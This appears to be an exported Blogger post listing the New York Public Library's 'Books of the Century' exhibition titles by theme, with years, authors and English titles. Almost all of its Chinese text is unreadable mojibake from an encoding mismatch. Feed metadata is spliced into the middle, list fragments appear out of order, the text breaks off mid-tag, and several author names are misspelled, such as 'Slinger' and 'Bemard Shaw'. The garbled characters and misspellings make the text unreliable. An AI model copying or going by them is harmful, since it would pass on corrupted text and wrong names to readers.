    • 1896¦~¡¯¬°ך¶m₪g₪ו¾ַ₪k§@®a¡U¦¶¦ד¯S¡USarah O. Jewett, 1849-1909 -
      ¡m°w¼׳₪§¶m¡nThe Country of the Pointed Firs -
      -
    • -
    • 1903¦~¡¯¬°ך×¼ֵ₪₪k§@®a¡B±׀¨|®a¡U®­¡D³ֽ°ַ¡UHelen Keller, 1880-1968 -
      -¡m§×÷₪@¥ֽ¡nThe Story of My Life -
      -
    • -
    • 1911¦~¡@­^°ךµ½׳®a¡B¸ײ₪H¡B₪p»¡®a¡U₪ֱ´µ¯S¹y¡UG K. Chesterton, 1874-1936 -
      ¡m¥¬®װ¯«₪ק×÷²M¥ױ¡nThe Innocence of Father Brown -
      -
    • -
    • 1914¦~¡@¦ט¯Z₪ת¸ײ₪H¡U§ֶ±צ₪÷´µ¡UJuan Ramon Jimenze, 1881-1958 -
      ¡m×ק»ָ¦K»P§¡nPlateroy Yo; ­^ִ¶ Platero and I; An Andalusian Elegy -
      -
    • -
    • 1914¦~¡¯·R÷¸ִץ³¼@§@®a¡U¿½§B¯ַ¡UGeorge Bemard Shaw, 1856-1950 -
      -¡m½ז×ב₪k¡nPygmalion -
      -
    • -
    • 1922¦~¡¯¬°ך×ְ¥זֲ§»צֵv«ֲ¡U×i´µ¯S¡]©־ִ¶»Z·R±צ¡^¡UEmily Post, 1872-1960 -
      ¡m×ְ¥ז¬ֹ¡B°׃¬ֹ¡B¬F¬ֹ©M®a®x₪§ֲ§¸`¡nEtiquette in Society, in Business, in Politics, and at Home -
      -
    • -
    • 1923¦~¡@­^°ך₪p»¡®a¡B§ח±¡¸ײ₪H¡B¼@§@®a¡U¥מ¼wְN´µ¡UP. G. Wodehouse, 1881-1975 -
      ¡m₪ׁ₪UµLֲש×÷¦N₪ׂ´µ¡nThe Inimitable Jeeves -
      -
    • -
    • 1926¦~¡¯­^°ך«ױְq§@®a¡U¦ּ÷¸®¦¡UAlan A. Milne, 1882-1956 -
      -¡m¼P¼P÷µ÷¥§¡nWinnie-the-Pooh -
      -
    • -
    • 1931¦~¡@¬°ך₪k₪p»¡®a¡U³ֽ¶כ¡UWilla Cather, 1875-1947 -
      ¡m¥₪W×÷·t¼v¡nShadows on the Rock -
      -
    • -
    • 1931¦~¡@¬°ך­¹ֳ׀±M®a¡@¶©¥]÷¸₪ׂ₪H¡UIrma S. Rombauer, 1877-1962 -
      ¡m²i¶¹¼ײ¡nThe Joy of Cooking: A Compilation of Reliable Recipes with a Casual Culinary Chat -
      -
    • -
    • 1937¦~¡¯­^°ך¾ַ×ּ¡B§@®a¡U¦«÷¸×ק¡UJohn Ronald R. Tolkien, 1892-1973 -
      -¡mְN₪ס¯S¡nThe Hobbit, or There and Back Again -
      -
    • -
    • 1947¦~¡@¬°ך¨אµ£§@®a¡U¥¬®װ¡UMargaret Wise Brown, 1910-1952 -
      §ֳֹה¹ֿµe₪p»¡¡m±¦w₪כ«G¡nGoodnight Moon -
      -
    • -
    • 1960¦~¡¯¬°ך₪p»¡®a¡U§ץ²×i¡UHarper Lee, 1926- -
      -¡m±צ±^«°¬G¨ֶ¡nTo Kill a Mockingbird -
      -
    • -
    • 1961¦~¡@¬°ך¶ֲ₪H¸ײ₪H¡B§@®a¡U¥נ´µ¡ULangston Hughes, 1902-1967 -
      ¡m³ז¯ֲ₪§¦n³B¡nThe Best of Simple -
      -
    • -
    • 1983¦~¡@¬°ך₪k¸ײ₪H¡U²¦¾ו´¶¡UElizabeth Complete Poems -
      -
    • -
    -
    ₪Q₪G¡B¨אµ£¡B«C¦~³·R×÷ֵ×׫¡]Favorites of Childhood and Youth¡^¡׀¡׀8÷״ -
    -
      -
    • 1902¦~¡¯­^°ך¨אµ£ֵ×׫§@®a¡U×i¯S₪k₪h ¡UHelen Beatrix Potter, 1866-1943 -
      -¡m₪p¨©¼±o×÷¬G¨ֶ¡nThe Tale of Peter Rabbit -
      -
    • -
    • 1943¦~¡@¬°ך§@®a¡U¥v»e´µ¡UBetty Smith, 1896-1972 -
      ¡m₪@´¥ֽ×ר¦b¥¬¾|§J×L×÷¾נ¡nA Tree Grows in Brooklyn -
      -
    • -
    • 1950¦~¡@­^°ך¾ַ×ּ¡B₪p»¡®a¡U¸פ©צ₪h¡UClive Staples Lewis, 1898-1963 -
      -¨אµ£¬G¨ֶ¶°¡m·א₪l¡B₪k§ֵ©M¦חֲd¡nThe Lion, the Witch and Wardrobe -
      -
    • -
    • 1951¦~¡¯¬°ך§@®a¡U¨F×L³ַ¡UJerome David Slinger, 1919- -
      -¡m³ֱ¥׀®·₪ג¡nThe Catcher in the Rye -
      -
    • -
    • 1952¦~¡@¬°ך´²₪ו§@®a¡Uֳh¯S¡UElwyn Brooks White, 1899-1985 -
      -¨אµ£ֵ×׫¡m®L¬¥¯S×÷÷פ¡nCharlotte¡¦s Web -
      -
    • -
    • 1962¦~¡@¬°ך¨אµ£ֵ×׫§@®a¡Uְ·O¡UEzre Jack Keats, 1916-1983 -
      ¡m₪j³·₪ׁ¡nThe Snowy Day -
      -
    • -
    • 1963¦~¡@¬°ך¨אµ£ֵ×׫ְֳ³N®a¡U¥׃¹F§J¡UMaurice Sendak, 1928- -
      ¡m³¥×«¦b¨÷¸ּ¡H¡nWhere the Wild Things Are -
      -
    • -
    • 1985¦~¡@¬°ך¨אµ£ֵ×׫§@®a¡U³ֱ§J©װ§J­ ¡UPatricia Maclachlan, 1938- -
      -¡m¾כ¯ְ₪S°×₪j×÷²ן©װ¡nSarah, Plain and Tall -
      -
    • -
    -
    -
    -
    -
    -false -
    - - - -Letter Lego - -2004-12-08T23:21:44+08:00 -2004-12-08T18:18:44Z -2004-12-08T15:33:40Z - -tag:blogger.com,1999:blog-7678098.post-110252002038973030 -¡iֲא¸¡j¯ֳ¬ש₪½¦@¹ֿ®ְׁ]¡y¥@¬צ₪§®ׁ¡z¡]₪W¡^ -<span style="font-weight: bold;">¥@¬צ₪§®ׁ¡]₪W¡^</span> <br /><div style="text-align: right;">₪‎¿¼‎¡@°ך®a¹ֿ®ְׁ]°ׁ¦ׂ²ױ¥N¥D¥פ</div> <br />¡@¡@¯ֳ¬ש₪½¦@¹ֿ®ְׁ]¬°¼y¯¬¨ה¦¨¥100¶g¦~¡A¯S©ף1995¦~5₪כ20₪י¦1996¦~7₪כ13₪יֱ|¿ל₪@¶µ¡u¥@¬צ₪§®ׁ¡v¡]Books of the Century¡^×÷®iִ‎¡A¦@¬D¿ן¨ֳ®i¥X¹ן¥»¥@¬צ¨ד¦³¼vֵT₪O×÷159¥»¸g¨ו®ִׁy¡C³o159¥»®ׁ³ז¡A¬O¥ׁ¯ֳ¬ש₪½¦@¹ֿ®ְׁ]¸ך²`¥B¨ד¦³¾ַ³Nֵv«ֲ×÷®ׁ¥״±M®a¡B¥DֳD±M®aµ¥¥‎×ל¿ן¡B±ְֲֻ¥X1100÷״¹ֿ®ׁ¡A¦A±q₪₪½ֶ¿ן¥X¨׃×÷¡A¨ֳ₪ְ¬°11₪jֳ‏®i¥X¡C¦׃«ב¥D½s¬ד¨s²ױ¥D¥פֲLצ·×¡]Elizabeth Diefendorf¡^®¾¦U₪ט·N¨£¡A°u¼W³¡¥ק¹ֿ®ׁ¡A¨ֳ¼W¥[¡u¨אµ£₪־«C¦~ֵ×׫¡v¡]Favorites of Childhood and Youth¡^³o₪@ֳ‏¡Aֱ`­p¥»®ׁ¥״¦@₪ְ12ֳ‏¡A¦¬®ׁ175÷״¡C <br /> <br />¡@¡@¥Xש¦~«ב¦³¡u¡¯¡v°O¸¹×ּ¡A×ם¥µ§×ּ¬d¨ל¦³₪₪ִ¶¥»×ּ¡Aֱצ₪£₪@©w§¹¾ד¡A¦‎₪´¥i¨ׁ°ׁ¦ׂ¡C <br /> <br />¥״¦¸<blockquote>₪@¡B·ם¥N₪ו¾ַ×÷¨½µ{¸O¡]Landmarks of Modern Literature¡^ <br />₪G¡B¬ל¾ַ©־¦µM¬ֹ¡]Nature's Realm¡^×÷¸g¨ו¹ֿ®ׁ <br />₪T¡B§ִ³¡]Protest¡^©־«P¶i×ְ·|µo®i¡]Progress¡^₪§¸g¨וµ§@ <br />¥|¡B°ך®a¡B´¥ֱ¥D¸q¡]Colonialism¡^©M¨ה¼vֵT₪ט­±×÷¨וִy <br />₪­¡B₪ֶF©M÷כ¯«¡]Mind & Spirit¡^ֳ‏¹ֿ®ׁ <br />₪»¡B³q«U₪ו₪ֶ©M₪j²³®T¼ײ¡]Popular Culture &amp; Mass Entertainment¡^</blockquote> <br /><span class="fullpost"> <br />₪@¡B·ם¥N₪ו¾ַ×÷¨½µ{¸O¡]Landmarks of Modern Literature¡^¡׀¡׀24÷״ <br /><ul><li>1901¦~¡¯«X°ך₪p»¡®a¡Bְ¸¼@®a¡U«´¶F₪ׂ¡UAnton Pavlovich Chekhov, 1860-1904 <br />ְ¸¼@§@«~¡m₪T©n©f¡n¡UTri Sestry; ­^ִ¶ The Three Sisters <br /></li><li>1913-1927¦~¡¯×k°ך₪p»¡®a¡U´¶¾|´µ¯S¡UMarcel Proust,1871-1922 <br />¡m°l¾׀³u₪פ¦~µ״¡n¡UA la recherche du temps perdu; ­^ִ¶ Remembrance of Things Past <br /></li><li>1914¦~¡@¬°ך«e½ֳ₪k§@®a¡U´µ©Z¦]¡UGertrude Stein, 1874-1946 <br />¡m¬X³n×÷¶s³§¡nTender Buttons <br /></li><li>1915¦~¡¯¼w°ך₪p»¡®a¡U¥d₪ׂ¥d¡UFranz Kafka,1883-1924 <br /><span style="color: rgb(255, 0, 0);">₪p»¡¡m¸ְֵ¡n¡UDie Verwandlung; ­^ִ¶ The Metamorphosis</span> <br /></li><li>1917¦~¡@¬°ך₪k¸ײ₪H¡B¼@§@®a¡U¦ֱּ¢¡UEdna St. Vincent Millay, 1892-1950 <br />¡m·s¥ֽ»P¨ה¥L¸ײ½g¡nRenascence and Other Poems <br /></li><li>1917¦~¡@·R÷¸ִץ¸ײ₪H¡U¸­·O¡UWilliam Butler Yeats, 1865-1939 <br />¸ײ¶°¡m®w÷¸×÷³¥₪ֳׁZ¡nThe Wild Swans at Coole <br /></li><li>1921¦~¡¯¸q₪j§Q₪p»¡®a¡Bְ¸¼@®a¡U¥ײִץ¼w°ת¡ULuigi Perandello, 1867-1936 <br /><span style="color: rgb(255, 0, 0);">¼@¥»¡m₪»­׃´M§ה§@×ּ×÷¼@₪₪₪H¡nSei personaggi in cerca d'autore; ­^ִ¶ Six Characters in Search of an Author</span> <br /></li><li>1922¦~¡¯­^°ך¸ײ₪H¡B¼@§@®a¡U¦ד²₪¯S¡UT. S. Eliot, 1888-1965 <br /><span style="color: rgb(255, 0, 0);">¸ײ¶°¡m¯מ­ל¡nThe Waste Land</span> <br /></li><li>1922¦~¡¯·R÷¸ִץ₪p»¡¡U³ל¥ל´µ¡UJames Joyce, 1882-1941 <br /><span style="color: rgb(255, 0, 0);">₪p»¡¡m₪׳¨½¦ט´µ¡nUlysses</span> <br /></li><li>1924¦~¡¯¼w°ך₪p»¡®a¡U°ׂ®¦¡UThomas Mann, 1875-1955 <br /><span style="color: rgb(255, 0, 0);">¡mֵ]₪s¡nDer Zauberberg; ­^ִ¶ The Magic Mountain</span> <br /></li><li>1925¦~¡¯¬°ך₪p»¡®a¡U¶O¯ק³ֳַ¹¡UF. S. Fitzgerald, 1896-1940 <br /><span style="color: rgb(255, 0, 0);">¡m₪j¦כ₪p¶ַ¡nThe Great Gatsby</span> <br /></li><li>1927¦~¡¯­^°ך₪k§@®a¡U§d÷¸×¡UVirginia Woolf, 1882-1941 <br /><span style="color: rgb(255, 0, 0);">₪p»¡¡m¨ל¿O¶נ¥h¡nTo the Lighthouse</span> <br /></li><li>1928¦~¡@¦ט¯Z₪ת¸ײ₪H¡B¼@§@®a¡U¥[¦ט¨ָ¡D¬¥÷¸¥d¡UFederico Garcia Lorca, 1898-1936 <br />¡m¦N´¶ֱֹ÷qֱֱ¡nPrimer romancero gitano; ­^ִ¶ Gypsy Ballands <br /></li><li>1940¦~¡@¬°ך₪p»¡®a¡U÷ײ§J¯ַ¡UWilliam Faulkner, 1897-1962 <br />¡m³S¬ֳ¥»÷ײ§J¯ַ¿ן¶°¡nThe Portable Faulkner <br /></li><li>1947¦~¡@¬ִy­^°ך¸ײ₪H¡U¶רµn¡UW. H. Auden, 1907-1973 <br />¡m¼~¼{×÷®ֹ¥N¡nThe Age of Anxiety: A Baroque Eclogue <br /></li><li>1952¦~¡¯·R÷¸ִץְ¸¼@®a¡B₪p»¡®a¡U¨©§J¯S¡USamuel Beckett, 1906-1989 <br /><span style="color: rgb(255, 0, 0);">¼@¥»¡mµ¥«×GסnEn attendant Godot; ­^ִ¶ Waiting for Godot: A Tragicomedy in Two Acts</span> <br /></li><li>1952¦~¡¯¬°ך₪p»¡®a¡U®J§Q´ֻ¡URalph Ellison, 1914-1994 <br /><span style="color: rgb(255, 0, 0);">¡mֱפ§־₪H¡nInvisible Man</span> <br /></li><li>1955¦~¡¯ ¬°ך₪p»¡®a¡U¯ַ₪¬ל₪ׂ¡UVladimir Nabokov, 1899-1977 <br />₪p»¡¡m¬¥²ת¶נ¡nLolita <br /></li><li>1956¦~¡@×®§¸ײ₪H¡B₪p»¡®a¡U×i»®₪h¡UJorge Luis Borges, 1899-1986 <br /><span style="color: rgb(255, 0, 0);">₪p»¡¶°¡m°°¸ֻ¡nFicciones; ­^ִ¶ Fictions</span> <br /></li><li>1957¦~¡@¬°ך¸ײ₪H¡B₪p»¡®a¡U§J¬¥₪ּ¡UJack Kerouac, 1922-1969 <br />₪p»¡ ¡m¦b¸פ₪W¡nOn the Road <br /></li><li>1967¦~¡¯­פ­₪ס¨ָ₪p»¡®a¡U°¨«¶´µ¡UGabriel Garcia Marquez, 1928- <br /><span style="color: rgb(255, 0, 0);">¡m¦¦~©t±I¡nCien anos de Soledand; ­^ִ¶ One Hundred Years of Solitude</span> <br /></li><li>1969¦~¡@¬°ך₪p»¡®a¡Uֳ¹´µ¡UPhilip Roth, 1933- <br />¡m×i¯S¿ױ¥ל×÷©ך«ט¡nPortnoy's Complaint <br /></li><li>1977¦~¡@¬°ך₪p»¡®a¡U²צ²ת´ֻ¡UToni Morrison, 1931- <br />¡m©ֳׂ¹×ש₪§÷q¡nSong of Solomon <br /></li></ul> <br />₪G¡B¦³ֳצ¬ל¾ַ©־¦µM¬ֹ¡]Nature's Realm¡^×÷¸g¨ו¹ֿ®ׁ¡׀¡׀10÷״ <br /><ul><li>1901¦~¡@₪ס§Q®ֹ¶H¼x¥D¸q¸ײ₪H¡B¼@§@®a¡U±צ¯S×L§J¡UMaurice Maeterlinck, 1862-1949 <br />°×«¦ז¬°ֶ[¹מְHµ§¡m»e¸ֱ×÷¥ֽ¬¡¡nLa vie des abeilles; ­^ִ¶ The Life of the Bee <br /></li><li>1910¦~¡@×k°ך¬ל¾ַ®a¡U©~¨½₪ׂ₪HMarie Sklodowska Curie, 1867-1934 <br />¡m©ס®g©½׳»¡¡nTraite de radioactivite; ­^ִ¶ Treatise on Radioactivity <br /></li><li>1922¦~¡¯ ¬°ך׫²z¾ַ®a¡U·R¦]´µ©Z¡UAlbert Einstein, 1879-1955 <br />¡m¬¹ן½׳¡nThe Meaning of Relativity <br /></li><li>1934¦~¡@¬°ך³¾ֳ‏¾ַ®a¡B¦µM¸ך·½«Oֵ@½׳×ּ¡U©¼±o´ֻ¡URoger Tory Peterson, 1908- <br />¡m³¾ֳ‏³¥¥~¦ׂ¹מ««n¡nA Field Guide to the Birds <br /></li><li>1949¦~¡¯¬°ך¦µM«Oֵ@§@®a¡U§ץ¶ר©¼¼w¡UAldo Leopold, 1886-1948 <br /><span style="color: rgb(255, 0, 0);">¡m¬ג¦a°p¾ה»x¡nA Sand County Almanac</span> <br /></li><li>1949¦~¡¯¶ר¦a§Q°×«¾ַ®a¡U¬¥­¯ק¡UKonrad Z. Lorenz <br /><span dragover="true" style="color: rgb(255, 0, 0);">¡m©ֳׂ¹×ש₪‎×÷§«¡nEr redete mit dem Vieh, den Vogeln und den Fischen : King Solomon's Ring; ­^ִ¶ King Solomon's Ring¡GNew Light on Animal Ways</span> <br /></li><li>1962¦~¡¯¬°ך¥ֽ÷A¾ַ®a¡U¥d»¹₪k₪h¡URachel Carson, 1907-1964 <br /><span style="color: rgb(255, 0, 0);">¡m±IְR×÷¬K₪ׁ¡nSilent Spring</span> <br /></li><li>1964¦~¡@¬°ך°·±d±׀¨|÷ײ§Q³¡₪½¦@½ֳ¥ֽ§½¡UU. S. Dept. of Health, Education, and Welfare: Public Health Service¡U¦L¦ז¡m©ג·ֿ©M°·±d¡nSmoking and Health: The Surgeon General's Report <br /></li><li>1968¦~¡¯¬°ך¿ע¶ַ¡B¥ֽ׫¾ַ®a¡Uµ״¯S¥ֽ¡UJames Dewey Watson, 1928- <br />¡mֲשֱ³±¡nThe Double Helix: A Personal Account of Discovery of the Structure of DNA <br /></li><li>1992¦~¡¯¬°ך¥ֽ׫¾ַ®a¡UֳQ÷¸¥ֽ¡UEdward O. Wilson, 1927- <br /><span style="color: rgb(255, 0, 0);">¡mִ}¯ֹ×÷¥ֽ©R¡nThe Diversity of Life</span> <br /></li></ul> <br />₪T¡B¦³ֳצ§ִ³¡]Protest¡^©־«P¶i×ְ·|µo®i¡]Progress¡^₪§¸g¨וµ§@¡׀¡׀15÷״ <br /><ul><li>1902¦~¡@¬°ך·s»D°O×ּ¡B×ְ·|§ן­²®a¡U¨½´µ¡UJacob Riis, 1849-1914 <br />¡m»P³h¥ֱ¸]×÷¾װ×§¡nThe Battle with the Slum <br /></li><li>1903¦~¡@¬°ך¶ֲ₪H×ְ·|¾ַ®a¡U§ש³ױ´µ¡UW.E.B. Du Bois, 1868-1963 <br />¡m¶ֲ₪H×÷ֶF»מ¡nThe Soul of Black Folk <br /></li><li>1906¦~¡@¬°ך₪p»¡®a¡U¨¯§Jµ¡UUpton Sinclair, 1878-1968 <br />₪p»¡¡m±O³ץ¡nThe Jungle <br /></li><li>1910¦~¡@¬°ך×ְ·|§ן¨}®a₪־©M¥­¥D¸q×ּ¡U¬ֳ¡D¨ָ·ם´µ¡UJane Addams, 1860-1935 <br />¡m»®÷¸₪j·H₪G₪Q¦~¡nTwenty Years at Hull-House <br /></li><li>1915¦~¡@¬°ך×ְ·|¾ַ®a¡Bֵ@₪h¡B×ְ·|₪u§@×ּ¡U¨U÷¸¼w¡ULillian Wald, 1867-1940 <br />¡m¦כ§Qµף₪j·H¡nThe House on Henry Street <br /></li><li>1931¦~¡@¬°ך·s»D°O×ּ¡B÷t»¡®a¡U´µ¸¦×ג´µ¡ULincoln Steffens, 1866-1936 <br />¡m´µ¸¦×ג´µ¦¶ַ¡nThe Autobiography of Lincoln Steffens <br /></li><li>1937¦~¡@¬°ך₪p»¡¥[¡Bµ½׳®a¡U¦h´µ¡D©¬¯ֱ´µ¡UJohn Dos Passos, 1896-1970 <br />¡m¬°ך¡nU.S.A. <br /></li><li>1939¦~¡¯¬°ך₪p»¡®a¡U¥v©Z¨©§J¡UJohn Steinbeck, 1902-1968 <br />¡m¼««ד×÷¸²µו¡nThe Grapes of Wrath <br /></li><li>1941¦~¡@¬°ך§@®a¡U¦ד³ַ¡UJames Agee, 1909-1955 <br />¬°¡m©¯÷ײ¡nFortuneֲר»x©חִב×÷«n₪ט¦ת¹A¥ֽ¬¡§@«~¡mֵ‎§­ּ¨׃÷q¹|¨÷¨ַµ¦W×÷₪H­ּ¡nLet Us Now Praise Famous Men <br /></li><li>1944¦~¡¯¬°ך§@®a©M÷״±¥­µ¥°«₪h¡U¥v±Kµ·¡ULillian Smith, 1897-1966 <br />¡m©_©ַ×÷×G¹ך¡nStrange Fruit <br /></li><li>1960¦~¡@¬°ך₪p»¡®a¡B¸ײ₪H¡U¥j¼w°ׂ¡UPaul Goodman, 1911-1972 <br />¡m¯מֲױ¦a¦¨×ר¡nGrowing Up Absurd <br /></li><li>1963¦~¡@¬°ך¶ֲ₪H₪p»¡₪־´²₪ו§@®a¡Uְj¼w·ֵ¡UJames Baldwin, 1942-1987 <br />¡m₪U₪@¦¸×÷¯P₪ץ¡nThe Fire Next Time <br /></li><li>1965¦~¡@¬°ך¶ֲ₪H¥ֱ±¥D¸q×ּ¡U³ֱ±d©i¡DX¡UMalcolm X, 1925-1965 <br />¡m³ֱ±d©i¡DX¦¶ַ¡nThe Autobiography of Malcolm X <br /></li><li>1987¦~¡@¬°ך§@®a¡B·s»D°O×ּ¡U®u÷¸¯ק¡URandy Shilts, 1952-1994 <br />¡m¼ײ¹־÷t«µ¡nAnd the Band Played On <br /></li><li>1991¦~¡@¬°ך₪p»¡®a¡B·s»D°O×ּ¡U±Fֳ¹«ֲ¯ק¡UAlex Kotlowitz, 1955- <br />¡m³o¨א¨S¦³₪p«ִ¡nThere Are No Children Here <br /></li></ul> <br />¥|¡B¦³ֳצ°ך®a¡B´¥ֱ¥D¸q¡]Colonialism¡^©M¨ה¼vֵT₪ט­±×÷¨וִy¡׀¡׀17÷״ <br /><ul><li>1900¦~¡¯­^°ך¯ט®₪p»¡®a¡U±d©װ¼w¡UJoseph Conrad, 1857-1924 <br />₪p»¡¡m¦N©i·¡nLord Jim <br /></li><li>1901¦~¡¯­^°ך₪p»¡®a¡B¸ײ₪H¡U¦N₪R×L¡UJoseph Rudyard Kiping, 1865-1936 <br />¡m×ק©i¡nKim <br /></li><li>1921-1940¦~¡@¦L«׳¥ֱ±¥D¸q»ג³S¡U¥ּ¦a¡UMohandas K. Gandhi, 1869-1948 <br />¡m₪£¦X§@¥D¸q¡nSatyagraha; ­^ִ¶ Non-Violent Resistance <br /></li><li>1924¦~¡¯­^°ך₪p»¡®a¡B´²₪ו®a¡U÷ײ´µ¯S ¡UE.M. Forster, 1879-1970 <br /><span style="color: rgb(255, 0, 0);">¡m¦L«׳₪§®ָ¡nA Passage to India</span> <br /></li><li>1942¦~¡¯×k°ך₪p»¡®a¡U¥dֲױ¡UAlbert Camus, 1913-1960 <br /><span style="color: rgb(255, 0, 0);">₪p»¡¡m²§¶m₪H¡nL'etranger; ­^ִ¶ The Stranger</span> <br /></li><li>1945¦~¡¯¡mֱp¦X°ך¾ֻ³¹¡nUnited Nations Charter <br /></li><li>1948¦~¡@«n«D§@®a¡U¨״¹y¡UAlan Paton, 1903-1988 <br />₪p»¡¡m­ת§a¡I¿ֻ·R×÷¯×°ך¡nCry, the Beloved Country <br /></li><li>1955¦~¡¯¬°ךִב¼v₪j®v¡U¥v®ץ´¡UEdward Steichen, 1879-1973 <br />¬°¯ֳ¬ש²{¥Nְֳ³Nְ] Museum of Modern Art ֱ|¿ל×÷ִב¼v®i¥‏¶°¡m₪Hֳ‏₪@®a¡nThe Family of Man : The Photographic Exhibition Created by Edward Steichen for the Musuem of Modern Art <br /></li><li>1958¦~¡¯©`₪־§Q¨ָ₪p»¡®a¡U׫´¨©¡UChinua Achebe, 1930- <br />₪p»¡¡m¥ֻ¸ׁ¡nThings Fall Apart <br /></li><li>1961¦~¡@×k°ך÷כ¯«₪ְ×R¾ַ®a»P×ְ·|­ץ¾ַ®a¡U×k¹A¡UFrantz Fanon, 1925-1961 <br />¡m₪j¦a×÷₪£©¯×ּ¡nLes damne's de la terre; ­^ִ¶ The Wretched of the Earth <br /></li><li>1966¦~¡@­^°ך₪k₪p»¡®a¡U¨½´µ¡UJean Rhys, 1890-1979 <br />₪p»¡¡m¿סֱן×÷ִ¦®¡nWide Sargasso Sea <br /></li><li>1969¦~¡@ִ¬₪¦×©װ§B»y₪p»¡®a¡Uֲִ§Q»®¡UTayeb El- Salih, 1929- <br />₪p»¡¡m¥_±p®ֹ¸`¡nMawsin al- Hijra ila al-Shamal; ­^ִ¶ Season of Migration to the North <br /></li><li>1975¦~¡@₪d¨½¹F₪p»¡®a¡U­@×i¦ױ¡UV. S. Naipaul, 1932- <br />₪p»¡¡m´וְ»¶₪¡nGuerrillas <br /></li><li>1976¦~¡@©`₪־§Q¨ָ₪k×ְ·|¾ַ®a¡B¸ײ₪H¡B§@®a¡U®J±צ₪ֱ¶נ¡UBuchi Emecheta, 1944- <br />¡m±mֲ§¡nThe Bride Price <br /></li><li>1978¦~¡@×iִץ§@®a¡U¥d¨B¨¯´µ°ע¡URyszard Kapuscinski <br />¡m¬׃«ׂ¡nCesarz; ­^ִ¶ The Emperor <br /></li><li>1983¦~¡@¥¦a°¨©װ¿ױ¨©÷¸©M¥­¼ת±o¥D¡U©s¯]¡URigoberta Menchu, 1959- <br />¦¶ַ¡m§¡AִR®ז§B¶נ¡D©s¯]¡nMe llamo Rigoberta Menchuy asi me nacio conciencia; ­^ִ¶ I, Rigoberta Menchu <br /></li><li>1984¦~¡¯×k°ך₪p»¡®a¡U²ק«¢µ·¡UMarguerite Duras, 1914- <br /><span style="color: rgb(255, 0, 0);">¡m±¡₪H¡nL'amant; ­^ִ¶ The Lover</span> <br /></li></ul> <br />₪­¡B¦³ֳצ₪ֶF©M÷כ¯«¡]Mind & Spirit¡^ֳ‏¹ֿ®ׁ¡׀¡׀15÷״ <br /><ul><li>1897¦~¡@×k°ך×ְ·|¾ַ®a¡Uׂ\÷¸·F¡UEmile Durkheim, 1858-1917 <br /><span style="color: rgb(255, 0, 0);">¡m½׳¦±‏¡nLe Suicide: e'tude de sociologie; ­^ִ¶ Suicide: A Study in Sociology</span> <br /></li><li>1900¦~¡¯¶ר¦a§Q÷כ¯«₪ְ×R¾ַ®a¡U¥±¬¥¥ל¼w¡USigmund Freud, 1856-1939 <br /><span style="color: rgb(255, 0, 0);">¡m¹×÷¸ׁ×R¡nDie Traumdeutung; ­^ִ¶ The Interpretation of Dreams</span> <br /></li><li>1901-1928¦~¡¯­^°ך§@®a¡Bֲו®v¡U¦ד§Q´µ¡UHarelock Ellis, 1859-1939 <br />¡m©₪²z¬ד¨s¡nStudies in the Psychology of Sex <br /></li><li>1902¦~¡¯¬°ך₪²z¾ַ®a¡B­ץ¾ַ®a¡U¸ג©i´µ¡UWilliam James, 1842-1910 <br />¡m©v±׀¸gֵח÷״÷״¡nThe Varieties of Religious Experience: A Study in Human Nature <br /></li><li>1923¦~¡¯¾₪₪¹א­ץ²z´²₪ו®a¡U¬צ§B­¡UKahill Gibran, 1883-1931 <br /><span style="color: rgb(255, 0, 0);">¡m¥‎×¾¡nThe Prophet</span> <br /></li><li>1927¦~¡¯­^°ך­ץ¾ַ«ה·Q®a¡Uֳ¹¯ְ¡UBertrand Russel, 1872-1970 <br />¡m§¬°₪°»ע₪£¬O°ע·‏®{¡nWhy I am not a Christian <br /></li><li>1928¦~¡¯¬°ך₪k₪Hֳ‏¾ַ®a¡U¦ּ¼w¡UMargaret Mead, 1901-1978 <br /><span style="color: rgb(255, 0, 0);">¡mֲִ¼¯¨ָ₪H×÷¦¨¦~¡nComing of Age in Samoa</span> <br /></li><li>1943¦~¡¯×k°ך­ץ¾ַ®a¡B₪p»¡®a¡U¨F¯S¡UJean-Paul Satre, 1905-1980 <br /><span style="color: rgb(255, 0, 0);">¡m¦s¦b»PµךµL¡nL'etre et le neant; ­^ִ¶ Being and Nothingness</span> <br /></li><li>1946¦~¡¯¬°ך₪p¨א¬לֲו®v¡U¥v×i§J¡UDr. Benjamin M. Spock, 1903- <br />¡mְ¦¥®¨א«O°·±`ֳׁ¡nThe Common Sense Book of Baby and Child Care <br /></li><li>1952¦~¡¯<span style="color: rgb(255, 0, 0);">¡m¸t¸g¡n­׳­q¼׀·ַש The Holy Bible; Revised Standard Version</span> <br /></li><li>1952¦~¡¯¼w¸ַ¬ִy°ע·‏±׀¯«¾ַ®a¡U¥׀¥§J¡UPaul Tillich, 1886-1965 <br />¡m¦s¦b×÷«i®נ¡nThe Courage to be <br /></li><li>1962¦~¡¯¬°ך₪p»¡®a¡U³ֽ¦ט¡UKen Kesey, 1935- <br /><span style="color: rgb(255, 0, 0);">¡m­¸¶V§שֳY÷¡nOne Flew Over the Cuckoo's Nest</span> <br /></li><li>1968¦~¡@¬°ךֲוֳִ¾ַ×ּ¡U¨½·ח¡UTimothy Leary, 1920- <br />¡m«י±«×÷ֶ[©ְ¡nThe Politics of Ecstasy <br /></li><li>1969¦~¡¯¬°ך÷כ¯«¬לֲו®v¡U®w°ַ¾|µ·¡UElisabeth Kubler-Ross, 1926- <br />¡m½׳¦÷₪`»Pֳx₪`¡nDeath and Dying <br /></li><li>1967¦~¡@¶ר¦a§Q¸ַ¬ִy₪²z¾ַ®a¡U¨©¯S÷¸®©i¡UBruno Bettelheim <br />¡mֵ]×k×÷§Q¥־¡F¯«¥P¬G¨ֶ×÷·N¸q©M­«­n©¡nThe Use of Enchantment <br /></li></ul> <br />₪»¡B³q«U₪ו₪ֶ©M₪j²³®T¼ײ¡]Popular Culture & Mass Entertainment¡^ֳ‏¹ֿ®ׁ¡׀¡׀18÷״ <br /><ul><li>1897¦~¡@·R÷¸ִץ§@®a¡U´µ¦h§J¡UBram Stoker, 1847-1912 <br /><span style="color: rgb(255, 0, 0);">°­©ַ¬G¨ֶ¡m¼w©װ®w©װ¡nDracula</span> <br /></li><li>1898¦~¡¯¬°ך₪p»¡®a¡U¸ג©i₪h¡UHenry James, 1843-1916 <br /><span style="color: rgb(255, 0, 0);">¡m÷ֳׁf­ִ^¡nThe Turn of the Screw</span> <br /></li><li>1902¦~¡¯­^°ך°»±´₪p»¡§@®a¡U¬_«n¹D÷¸¡UArthur Conan Doyle, 1859-1930 <br /><span style="color: rgb(255, 0, 0);">¡m¶A©G×÷ֵ]₪¡nThe Hound of the Baskervilles</span> <br /></li><li>1912¦~¡¯¬°ך₪p»¡®a¡U¬f®ז¯ק¡UEdgar R. Burroughs, 1875-1950 <br /><span style="color: rgb(255, 